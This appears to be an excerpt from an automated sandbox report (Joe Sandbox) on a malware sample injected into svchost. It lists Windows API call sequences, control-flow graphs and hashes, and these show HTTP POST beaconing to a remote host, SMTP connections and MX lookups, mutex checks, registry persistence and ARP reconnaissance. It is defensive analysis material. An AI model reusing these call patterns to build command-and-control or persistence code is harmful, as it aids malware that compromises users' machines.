                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E13E
                                                                                                                                                                                                                                                          • connect.WS2_32(00000002,00000010,00000019), ref: 1314E153
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E169
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314E174
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000), ref: 1314E1AF
                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1C1
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E1D8
                                                                                                                                                                                                                                                          • closesocket.WS2_32(-00000004), ref: 1314E218
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E23F
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1314E254
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E27C
                                                                                                                                                                                                                                                          • shutdown.WS2_32(00000002,00000000), ref: 1314E2A5
                                                                                                                                                                                                                                                          • closesocket.WS2_32 ref: 1314E2B0
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E31E
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 850683436-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: 884532be101f4125f9e2a3d78f4deace7286b04b60a9672c45879b0e44455058
                                                                                                                                                                                                                                                          • Instruction ID: b517c613e26f4d778944e9f90759b52dc2cffeb791a3b3e77eda24470bf5b908
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 884532be101f4125f9e2a3d78f4deace7286b04b60a9672c45879b0e44455058
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AC1CEB5944359BBDB12AFB8CCC5AAEB779FB05708F24443AE105A3150EB38A940CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 110 40010a0-40010b4 111 400138a-4001390 110->111 112 40010ba-40010be 110->112 112->111 113 40010c4-40010c8 112->113 113->111 114 40010ce-4001160 call 4002420 InternetCrackUrlA 113->114 114->111 117 4001166-4001186 InternetOpenA 114->117 117->111 118 400118c-40011bf InternetConnectA 117->118 119 40011c5-40011fd HttpOpenRequestA 118->119 120 400137d-4001384 InternetCloseHandle 118->120 121 4001370-4001377 InternetCloseHandle 119->121 122 4001203-400123b wnsprintfA HttpAddRequestHeadersA 119->122 120->111 121->120 123 4001241-400124b 122->123 124 4001363-400136a InternetCloseHandle 122->124 125 4001255-4001270 HttpSendRequestA 123->125 124->121 126 4001276-4001281 125->126 127 4001329-400133b GetLastError 125->127 129 4001283-4001287 126->129 130 40012f4 126->130 128 4001341-4001354 127->128 128->124 131 4001356-400135d 128->131 129->130 132 4001289-400128d 129->132 133 40012fe-4001325 InternetReadFile 130->133 131->124 131->125 132->130 134 400128f-40012cc InternetReadFile 132->134 133->133 135 4001327 133->135 136 40012d0-40012ec 134->136 137 40012ce 134->137 135->128 139 40012f0 136->139 140 40012ee 136->140 138 40012f2 137->138 138->135 139->134 140->138
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001268
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 040012AF
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001318
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04001329
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0400136A
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001377
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001384
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • <, xrefs: 04001113
                                                                                                                                                                                                                                                          • POST, xrefs: 040011DE
                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0400116E
                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 04001207
                                                                                                                                                                                                                                                          • */*, xrefs: 040010EC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleHttpRequest$FileOpenRead$ConnectCrackErrorHeadersLastSendwnsprintf
                                                                                                                                                                                                                                                          • String ID: */*$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                          • API String ID: 36006914-44380738
                                                                                                                                                                                                                                                          • Opcode ID: 9fa4bf02c9ea75f79ff1d9f1478294966c7574d2fb6980f9e93de3fe7dc98a0e
                                                                                                                                                                                                                                                          • Instruction ID: 924ce2a1f8c29fa5ce0fe30d710c3110d4c6ad508a20d83de47564b7f6a3be0e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa4bf02c9ea75f79ff1d9f1478294966c7574d2fb6980f9e93de3fe7dc98a0e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3981FFB0941218DFEB24CF54CC59BDEB7B5BB84704F008199E509BA2C0D77AAAE4CF55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EEA
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F34
                                                                                                                                                                                                                                                          • htons.WS2_32(00000035), ref: 13143F48
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F75
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: htons$ReadSleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 317343359-0
                                                                                                                                                                                                                                                          • Opcode ID: cd93dc0799926c54d16fcc9c145467d929a7e4ba395f2250695bf3e5af925f67
                                                                                                                                                                                                                                                          • Instruction ID: 0cc42a1c999a2f236a246cc9ba181085ba80ff9704f394df86cf8783f9710338
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd93dc0799926c54d16fcc9c145467d929a7e4ba395f2250695bf3e5af925f67
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19A1C175940289EFCB01CFA8CD84DDEBBB9AF55304F2980A9E944B7251DB31AE44CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 200 1314e325-1314e34b GetTickCount 201 1314e352-1314e380 call 13144d0b htons 200->201 204 1314e383-1314e389 201->204 205 1314e3e9 204->205 206 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 204->206 208 1314e3eb-1314e3f1 205->208 212 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 206->212 213 1314e3e0-1314e3e7 206->213 210 1314e462-1314e46f 208->210 211 1314e3f3-1314e3f9 208->211 216 1314e471-1314e478 210->216 217 1314e48a-1314e4aa call 13142f79 call 131506ce 210->217 214 1314e457-1314e460 211->214 215 1314e3fb-1314e43f socket setsockopt connect 211->215 212->213 213->204 213->205 214->208 214->210 221 1314e451-1314e452 closesocket 215->221 222 1314e441-1314e44c recv 215->222 218 1314e479-1314e47b 216->218 217->201 229 1314e4b0-1314e4b6 217->229 223 1314e484-1314e488 218->223 224 1314e47d 218->224 221->214 222->221 223->217 223->218 224->223 229->201 230 1314e4bc-1314e4ca Sleep 229->230 230->229 231 1314e4cc 230->231 231->201
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                                                                                          • String ID: 0u
                                                                                                                                                                                                                                                          • API String ID: 3184855960-3203441087
                                                                                                                                                                                                                                                          • Opcode ID: 9c85bccaa6443aa946ce0d528c36c0e7116a5a7e5b6d7a217dd06d23a84ec5da
                                                                                                                                                                                                                                                          • Instruction ID: ca660788ef7710c26ad6ab459e92a38f3dc0e22cb3ccb5353065bbacda7dbb4b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c85bccaa6443aa946ce0d528c36c0e7116a5a7e5b6d7a217dd06d23a84ec5da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E41E172944359BBEB12DBA8CC81AEEB77CFF15B08F180439F605B7180EB7469448B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13145417: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 1314334A
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13143355
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 131433B2
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 131433BA
                                                                                                                                                                                                                                                          • OpenMutexA.KERNEL32(00020000,00000000,zczoiir65502), ref: 131433C8
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 131433DD
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD3E: RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433EC), ref: 1314AD6C
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD3E: RegSetValueExA.ADVAPI32(131433EC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314AD91
                                                                                                                                                                                                                                                            • Part of subcall function 1314AD3E: RegCloseKey.ADVAPI32(131433EC), ref: 1314AD9A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$UyB$uplcgp74169$vbknd96411$zczoiir65502
                                                                                                                                                                                                                                                          • API String ID: 1822930774-3575236039
                                                                                                                                                                                                                                                          • Opcode ID: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                                                                                          • Instruction ID: 175d5b4083d35df8bae9dcae2fdc8861bee5e9bc7d1d616874c1029d22c04ec3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A11C4BA700365EFE7007BB98DC8B1E7A5CAB05258F784835EA05D2544FF38E8148A71
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 267 4001cd0-4001cf2 WSAStartup 268 4001f90-4001f95 267->268 269 4001cf8-4001d23 VirtualAlloc 267->269 269->268 270 4001d29-4001d3d 269->270 271 4001d47-4001d96 call 4002080 htons 270->271 274 4001d98-4001dae 271->274 275 4001dcd-4001def gethostbyname 271->275 274->275 276 4001db0-4001dcb inet_addr 274->276 277 4001df1-4001dfe 275->277 278 4001e04-4001e0b 275->278 276->278 277->278 279 4001e12-4001e2a socket 278->279 280 4001e0d 278->280 281 4001e31-4001e90 setsockopt * 2 connect 279->281 282 4001e2c 279->282 280->271 283 4001e96-4001efc call 4002080 call 4002420 call 40020b0 call 4001fa0 281->283 284 4001f2a-4001f65 closesocket Sleep 281->284 282->271 283->284 297 4001efe-4001f22 call 4002000 283->297 285 4001f77 284->285 286 4001f67-4001f73 284->286 285->271 286->285 289 4001f75-4001f8a VirtualFree 286->289 289->268 299 4001f27 297->299 299->284
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04001CEB
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00080000,00003000,00000004), ref: 04001D10
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 04001D6A
                                                                                                                                                                                                                                                          • inet_addr.WS2_32(?), ref: 04001DC0
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 04001DDD
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 04001E18
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(000000FF,0000FFFF,00001005,00001388,00000004), ref: 04001E55
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(000000FF,0000FFFF,00001006,00001388,00000004), ref: 04001E74
                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 04001E89
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 04001F31
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,000000FF,0000FFFF,00001006,00001388,00000004), ref: 04001F3D
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001F8A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtualsetsockopt$AllocFreeSleepStartupclosesocketconnectgethostbynamehtonsinet_addrsocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3701309590-0
                                                                                                                                                                                                                                                          • Opcode ID: eba8264825d544e27b5783e13d2b276375b44e68c0b3b3ddf4f61118a1edd19b
                                                                                                                                                                                                                                                          • Instruction ID: ece18662fe2b9cdf33fc9f0a27d031b2bb85f6a87541587434ee5482b908719f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eba8264825d544e27b5783e13d2b276375b44e68c0b3b3ddf4f61118a1edd19b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92613DB1A012149FFB24DB60CC55BEAB375BB49308F0085D9E649BB2C1DB75AE84CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • gethostname.WS2_32(?,00000040), ref: 13146229
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 13146232
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314625B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314626D
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146278
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                                                                                          • API String ID: 4149995341-444255208
                                                                                                                                                                                                                                                          • Opcode ID: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                                                                                          • Instruction ID: 7a2c4663479ef9ad84a752d5c9230923e458e2ff35e9fb1722c16f79618e7024
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C119EB6E10319BBDB11ABF4CD8AFCE7BACAF08659F144430F901E6140E7B8D64086A0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                                                                                            • Part of subcall function 131453CC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 1314AC94
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314ACA7
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314ACC3
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACEA
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD26
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1314AD2F
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 1314AD3A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID: UyB
                                                                                                                                                                                                                                                          • API String ID: 3351196999-4078557002
                                                                                                                                                                                                                                                          • Opcode ID: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                                                                                          • Instruction ID: a34f9d23611f9d677bd6044601ea1e3f523b2ceb4555f11e2428dda48e926ab4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C113075A40219FFFB05ABE5CD45FEE777CAB04708F100020E605B6095E7B46A44DB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 04001030: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0400104C
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04001B96
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000004), ref: 04001BB8
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04001C0A
                                                                                                                                                                                                                                                            • Part of subcall function 04002080: QueryPerformanceCounter.KERNEL32(00000000), ref: 04002094
                                                                                                                                                                                                                                                            • Part of subcall function 040020B0: QueryPerformanceCounter.KERNEL32(?), ref: 040020E7
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                                                                                            • Part of subcall function 040010A0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 04001C60
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04001CAE
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04001CB9
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$Open$CounterHttpPerformanceQueryRequestVirtual$AllocConnectCrackFreeHeadersInitializeSleepUninitializewnsprintfwsprintf
                                                                                                                                                                                                                                                          • String ID: http://%s/
                                                                                                                                                                                                                                                          • API String ID: 2417088823-3353559419
                                                                                                                                                                                                                                                          • Opcode ID: 42f0819b840b9358b28b6bd0552893a0d48155a987d5c5a954953fce4658f698
                                                                                                                                                                                                                                                          • Instruction ID: 878aa3c5fb1e96f414b6b1808169c8e5272be758e8650f444b0dce9c95422ffe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42f0819b840b9358b28b6bd0552893a0d48155a987d5c5a954953fce4658f698
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 953176B1D01204ABFB54DF94DC4ABDE77B4AB04708F148168E605BA2C1D775AA84CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 354 13143202-13143230 GetCurrentThreadId CreateThread 355 13143232-13143234 354->355 356 13143239-1314324b CreateThread 354->356 357 131432c0-131432c4 355->357 356->355 358 1314324d-1314325b Sleep 356->358 359 13143263-1314326a 358->359 360 13143281-13143294 CreateThread 359->360 361 1314326c-1314327f Sleep 359->361 360->355 362 13143296-131432a8 CreateThread 360->362 361->359 361->360 362->355 363 131432aa-131432be CreateThread 362->363 363->357
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13143206
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314AC80,00000000,00000000,1315B698), ref: 1314322C
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314E325,00000000,00000000,1315B684), ref: 13143247
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4,?,?,131433FF), ref: 13143259
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 13143271
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,0000FA00,1314609A,00000000,00000000,1315B688), ref: 1314328F
